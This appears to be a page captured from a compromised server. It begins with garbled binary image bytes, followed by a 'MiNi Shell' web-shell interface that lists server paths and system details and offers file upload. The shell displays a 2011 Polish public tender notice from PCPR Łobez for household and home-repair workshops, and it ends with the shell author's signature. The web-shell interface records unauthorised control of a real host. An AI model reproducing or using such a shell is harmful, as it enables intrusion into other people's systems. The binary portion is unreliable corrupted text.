JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110509/105718-N-2011.html

<p class="kh_header"><b>Łobez: usługi w zakresie  kompleksowego zorganizowania dwóch warsztatów w zakresie 
ABC gospodarstwa domowego oraz Nasze M dla uczestników projektu POMÓŻ SOBIE - od bierności do aktywności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 105718 - 2011; data zamieszczenia: 09.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Bema 27, 73-150 Łobez, woj. zachodniopomorskie, tel. 91 39768-41, faks 91 39768-41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pcpr.lobez.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi w zakresie  kompleksowego zorganizowania dwóch warsztatów w zakresie 
ABC gospodarstwa domowego oraz Nasze M dla uczestników projektu POMÓŻ SOBIE - od bierności do aktywności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz  Zamawiającego usługi w zakresie kompleksowego zorganizowania dwóch warsztatów ABC gospodarstwa domowego oraz Nasze M dla 14 uczestników projektu POMÓŻ SOBIE - od bierności do aktywności współfinansowanego ze środków Unii Europejskiej w ramach  Europejskiego  Funduszu Społecznego. 
Główne zagadnienia zajęć ABC gospodarstwa domowego: edukacja w zakresie higieny osobistej, utrzymanie czystości w mieszkaniu, edukacja w zakresie planowania wydatków - hierarchia potrzeb połączona z ekonomicznym i zdrowym przygotowaniem	posiłków. 
Główne zagadnienia zajęć Nasze M: dobór materiałów, zabezpieczenie otoczenia przed pracami remontowymi, przygotowanie podłoża pod malowanie, malowanie - techniki malarskie, przygotowanie podłoża pod nową podłogę, drobne naprawy. 

2.Miejsce realizacji: część teoretyczna - w siedzibie PCPR Łobez przy ul. Bema 27, 
część praktyczna - w miejscu zamieszkania beneficjenta.
3.Wymiar czasowy: ABC gospodarstwa domowego
część teoretyczna: w ciągu 1 tygodnia, w siedzibie PCPR Łobez w ramach 3 spotkań zostaną przeprowadzone 3 moduły teorii po 6 h zegarowych na każdy moduł, z 2 przerwami 15-to minutowymi, przy czym przerwy między zajęciami nie pomniejszą wymaganego wymiaru zajęć warsztatowych, tj. 6 h dziennie; łączna ilość godzin teoretycznych -18. 
część praktyczna: w środowisku każdego beneficjenta w ciągu 1 tygodnia w ramach 3 spotkań zostanie przeprowadzonych min. 15 h zegarowych zajęć praktycznych; łączna ilość godzin praktycznych na wszystkich beneficjentów -  210.
Wymiar czasowy: Nasze	M: 
część teoretyczna: w ciągu 1 tygodnia, w siedzibie PCPR Łobez w ramach 3 spotkań zostaną przeprowadzone 3 zajęcia z teorii po 6 h zegarowych, z 2 przerwami 15-to minutowymi, przy czym przerwy między zajęciami nie pomniejszą wymaganego wymiaru zajęć warsztatowych, tj. 6 h dziennie; łączna ilość godzin teoretycznych -18. 
część praktyczna: w środowisku każdego beneficjenta w ciągu 1 tygodnia zostanie przeprowadzonych min. 24 h zegarowych zajęć praktycznych; łączna ilość godzin praktycznych na wszystkich beneficjentów -  336  .                    
    4.Termin realizacji zamówienia: 01.06.2011 r. - 30.11.2011 r.
W ramach przedmiotu zamówienia  wykonawca zobowiązuje się do :
bieżącej współpracy z Zamawiającym w zakresie związanym z realizacją zamówienia,koordynacji oraz nadzoru merytorycznego i metodycznego nad realizowanymi zadaniami, realizacji poszczególnych zadań, przez wykwalifikowaną kadrę dydaktyczną i specjalistów w danej dziedzinie, z uwzględnieniem specyfiki osób biorących udział w zajęciach, prowadzenia dokumentacji związanej z realizacją zamówienia: harmonogram zajęć przedłożony zamawiającemu na 7 dni przed rozpoczęciem warsztatów, listy obecności, zaświadczenia/dyplomy, dokumentacja fotograficzna na nośniku danych, ankieta oceniająca warsztaty.
Dokumenty, materiały oraz miejsce , w którym zostaną przeprowadzone warsztaty powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach POKL 2007 - 2013,
Materiały niezbędne do przeprowadzenia zajęć praktycznych: każdy z uczestników warsztatów ABC gospodarstwa domowego  otrzyma po 3 pakiety materiałów. 1 pakiet (środki higieniczne) niezbędny do przeprowadzenia zajęć Edukacja w zakresie higieny osobistej: mydła, szampony, pasty i szczoteczki do zębów, dezodoranty, kremy/pianki i maszynki jednorazowe do golenia, płyny do kąpieli, gąbki kąpielowe, patyczki i płatki kosmetyczne, szczotki i grzebienie do włosów, papier toaletowy, itp. 2 pakiet ( środki chemiczne) niezbędny do przeprowadzenia zajęć Utrzymanie czystości w mieszkaniu: płyny do naczyń, płyny uniwersalne, zmywaki kuchenne, worki na śmieci, płyny  i kostki wc, płyny do mycia szyb, proszki do prania, odplamiacze, preparaty do udrożniania rur, mleczka do czyszczenia sanitariatów, płyny do mycia podłóg, ścierki domowe i do podłóg, ręczniki kuchenne, odświeżacze, komplet: kij + mop + wiadro z wyciskaczem, komplet: szczotka do zamiatania + kij + szufelka + zmiotka, końcówki wymienne do mopa, kosz na śmieci, miska plastikowa, itp. 3 pakiet (art. spożywcze i drobne AGD ) niezbędny do przeprowadzenia zajęć Edukacja w zakresie planowania wydatków - hierarchia potrzeb połączona z ekonomicznym i zdrowym przygotowywaniem posiłków pieczywo, wędliny, sery, warzywa, mięso, mąka, cukier, tłuszcze, itp. oraz zestaw garnków + patelnia + czajnik, sztućce, itp.               
Materiały niezbędne do przeprowadzenia zajęć praktycznych: każdy z uczestników warsztatów Nasze M otrzyma niezbędne drobne materiały warsztatowe m.in.: narzędzia malarskie, farby ścienne i sufitowe, gipsy i masy szpachlowe, grunty ścienne  i sufitowe, wykładziny PCV, panele, itp.
zadanie  wykona  na jak  najwyższym  poziomie,  z zachowaniem  obowiązujących         przepisów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie spełniania warunków jw. odbywać się będzie poprzez badanie treści dokumentów załączonych w treści oferty oraz innych koniecznych czynności   zmierzających do zbadania poprawności i wiarygodności złożonej oferty wg formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał   
jedną usługę o podobnym charakterze o wartości minimum  20.000,00 zł wraz z załączonym dokumentem, iż usługa została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dyponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia ,
w    szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;
Na potwierdzenie, iż wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia wykonawca musi zapewnić realizację zamówienia przez 1 osobę zgodnie z  tematyką  dla danej części., która: posiada niezbędne kwalifikacje i doświadczenie do wykonania tego zamówienia w środowisku beneficjenta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, wyceny ,podwykonawcy,oświadczenie ospełnieniu warunków udziału w postepowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - dodatkowe godziny do przeprowadzenia warsztatów - 10</li>
<li>3 - wykonawca,który jest podmiotem ekonomii społecznej lub utworzony dzięki wsparciu z EFS - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pcpr.lobez.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://pcpr.lobez.ibip.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2011 godzina 10:00, miejsce: siedziba Powiatowego Centrum Pomocy Rodzinie w Łobzie , ul. Bema 27, 73-150 Łobez, w pokoju nr 3 ..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w związku realizacją projektu systemowego  w ramach Programu Operacyjnego  Kapitał Ludzki współfinansowanego przez Unię Europejską,
Priorytet: VII Promocja Integracji społecznej, Działania: 7.1. Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centra Pomocy Rodzinie, Tytuł projektu :  Pomóż sobie - od bierności do aktywności..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi w zakresie kompleksowego zorganizowania d warsztatów w zakresie ABC gospodarstwa domowego dla 14 uczestników projektu    uczestników projektu POMÓŻ SOBIE - od bierności do aktywności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Główne zagadnienia zajęć ABC gospodarstwa domowego edukacja w zakresie higieny osobistej, utrzymanie czystości w mieszkaniu, edukacja w zakresie planowania wydatków - hierarchia potrzeb połączona z ekonomicznym i zdrowym przygotowaniem	posiłków. 2.	Miejsce realizacji: część teoretyczna - w siedzibie PCPR Łobez przy ul. Bema 27, 
część praktyczna - w miejscu zamieszkania beneficjenta.
3.Wymiar czasowy: ABC gospodarstwa domowego
część teoretyczna: w ciągu 1 tygodnia, w siedzibie PCPR Łobez w ramach 3 spotkań zostaną przeprowadzone 3 moduły teorii po 6 h zegarowych na każdy moduł, z 2 przerwami 15-to minutowymi, przy czym przerwy między zajęciami nie pomniejszą wymaganego wymiaru zajęć warsztatowych, tj. 6 h dziennie; łączna ilość godzin teoretycznych -18. 
część praktyczna: w środowisku każdego beneficjenta w ciągu 1 tygodnia w ramach 3 spotkań zostanie przeprowadzonych min. 15 h zegarowych zajęć praktycznych; łączna ilość godzin praktycznych na wszystkich beneficjentów -  210.
4.Termin realizacji zamówienia: 01.06.2011 r. - 30.09.2011 r.W ramach przedmiotu zamówienia  wykonawca zobowiązuje się do :
bieżącej współpracy z Zamawiającym w zakresie związanym z realizacją zamówienia,koordynacji oraz nadzoru merytorycznego i metodycznego nad realizowanymi zadaniami,realizacji poszczególnych zadań, przez wykwalifikowaną kadrę dydaktyczną i specjalistów w danej dziedzinie, z uwzględnieniem specyfiki osób biorących udział w zajęciach, prowadzenia dokumentacji związanej z realizacją zamówienia: harmonogram zajęć przedłożony zamawiającemu na 7 dni przed rozpoczęciem warsztatów, listy obecności, zaświadczenia,dyplomy, dokumentacja fotograficzna na nośniku danych, ankieta oceniająca warsztaty.
Dokumenty, materiały oraz miejsce , w którym zostaną przeprowadzone warsztaty powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach POKL 2007 - 2013,
Materiały niezbędne do przeprowadzenia zajęć praktycznych: każdy z uczestników warsztatów ABC gospodarstwa domowego  otrzyma po 3 pakiety materiałów. 1 pakiet (środki higieniczne) niezbędny do przeprowadzenia zajęć Edukacja w zakresie higieny osobistej: mydła, szampony, pasty i szczoteczki do zębów, dezodoranty, kremy,pianki i maszynki jednorazowe do golenia, płyny do kąpieli, gąbki kąpielowe, patyczki i płatki kosmetyczne, szczotki i grzebienie do włosów, papier toaletowy, itp. 2 pakiet ( środki chemiczne) niezbędny do przeprowadzenia zajęć Utrzymanie czystości w mieszkaniu: płyny do naczyń, płyny uniwersalne, zmywaki kuchenne, worki na śmieci, płyny  i kostki wc, płyny do mycia szyb, proszki do prania, odplamiacze, preparaty do udrożniania rur, mleczka do czyszczenia sanitariatów, płyny do mycia podłóg, ścierki domowe i do podłóg, ręczniki kuchenne, odświeżacze, komplet: kij + mop + wiadro z wyciskaczem, komplet: szczotka do zamiatania + kij + szufelka + zmiotka, końcówki wymienne do mopa, kosz na śmieci, miska plastikowa, itp. 3 pakiet (art. spożywcze i drobne AGD ) niezbędny do przeprowadzenia zajęć Edukacja w zakresie planowania wydatków - hierarchia potrzeb połączona z ekonomicznym i zdrowym przygotowywaniem posiłków: pieczywo, wędliny, sery, warzywa, mięso, mąka, cukier, tłuszcze, itp. oraz zestaw garnków + patelnia + czajnik, sztućce, itp.    zadanie  wykona  na jak  najwyższym  poziomie,  z zachowaniem  obowiązujących         przepisów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. dodatkowe godziny do przeprowadzenia warsztatów - 10</li>
<li>3. wykonawca, który jest podmiotem ekonomii społecznej lub utworzony dzięki     wsparciu  z EFS - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie przez Wykonawcę na rzecz  Zamawiającego usługi w zakresie kompleksowego zorganizowania dwóch warsztatów  Nasze M dla 14 uczestników projektu POMÓŻ SOBIE - od bierności do aktywności współfinansowanego ze środków Unii Europejskiej w ramach  Europejskiego  FunduszuSpołecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> świadczenie przez Wykonawcę na rzecz  Zamawiającego usługi w zakresie kompleksowego zorganizowania dwóch warsztatów  Nasze M dla 14 uczestników projektu POMÓŻ SOBIE - od bierności do aktywności współfinansowanego ze środków Unii Europejskiej w ramach  Europejskiego  FunduszuSpołecznego.Główne zagadnienia zajęć Nasze M: dobór materiałów, zabezpieczenie otoczenia przed pracami remontowymi, przygotowanie podłoża pod malowanie, malowanie - techniki malarskie, przygotowanie podłoża pod nową podłogę, drobne naprawy. 2.Miejsce realizacji: część teoretyczna - w siedzibie PCPR Łobez przy ul. Bema 27, 
część praktyczna - w miejscu zamieszkania beneficjenta.
Wymiar czasowy: Nasze	M: 
część teoretyczna: w ciągu 1 tygodnia, w siedzibie PCPR Łobez w ramach 3 spotkań zostaną przeprowadzone 3 zajęcia z teorii po 6 h zegarowych, z 2 przerwami 15-to minutowymi, przy czym przerwy między zajęciami nie pomniejszą wymaganego wymiaru zajęć warsztatowych, tj. 6 h dziennie; łączna ilość godzin teoretycznych -18. 
część praktyczna: w środowisku każdego beneficjenta w ciągu 1 tygodnia zostanie przeprowadzonych min. 24 h zegarowych zajęć praktycznych; łączna ilość godzin praktycznych na wszystkich beneficjentów -  336  . 	Termin realizacji zamówienia: 01.06.2011 r. - 30.09.2011  W ramach przedmiotu zamówienia  wykonawca zobowiązuje się do :bieżącej współpracy z Zamawiającym w zakresie związanym z realizacją zamówienia,koordynacji oraz nadzoru merytorycznego i metodycznego nad realizowanymi zadaniami,realizacji poszczególnych zadań, przez wykwalifikowaną kadrę dydaktyczną i specjalistów w danej dziedzinie, z uwzględnieniem specyfiki osób biorących udział w zajęciach,prowadzenia dokumentacji związanej z realizacją zamówienia: harmonogram zajęć przedłożony zamawiającemu na 7 dni przed rozpoczęciem warsztatów, listy obecności, zaświadczenia/dyplomy, dokumentacja fotograficzna na nośniku danych, ankieta oceniająca warsztaty.
Dokumenty, materiały oraz miejsce , w którym zostaną przeprowadzone warsztaty powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach POKL 2007 - 2013,
  Materiały niezbędne do przeprowadzenia zajęć praktycznych: każdy z uczestników warsztatów Nasze M otrzyma niezbędne drobne materiały warsztatowe m.in.: narzędzia malarskie, farby ścienne i sufitowe, gipsy i masy szpachlowe, grunty ścienne i sufitowe, wykładziny PCV, panele, itp.
Materiały niezbędne do przeprowadzenia zajęć praktycznych: każdy z uczestników warsztatów Nasze M otrzyma niezbędne drobne materiały warsztatowe m.in.: narzędzia malarskie, farby ścienne i sufitowe, gipsy i masy szpachlowe, grunty ścienne  i sufitowe, wykładziny PCV, panele, itp.
zadanie  wykona  na jak  najwyższym  poziomie,  z zachowaniem  obowiązujących         przepisów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. dodatkowe godziny do przeprowadzenia warsztatów - 10</li>
<li>3. wykonawca, który jest podmiotem ekonomii społecznej lub utworzony dzięki     wsparciu  z EFS - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com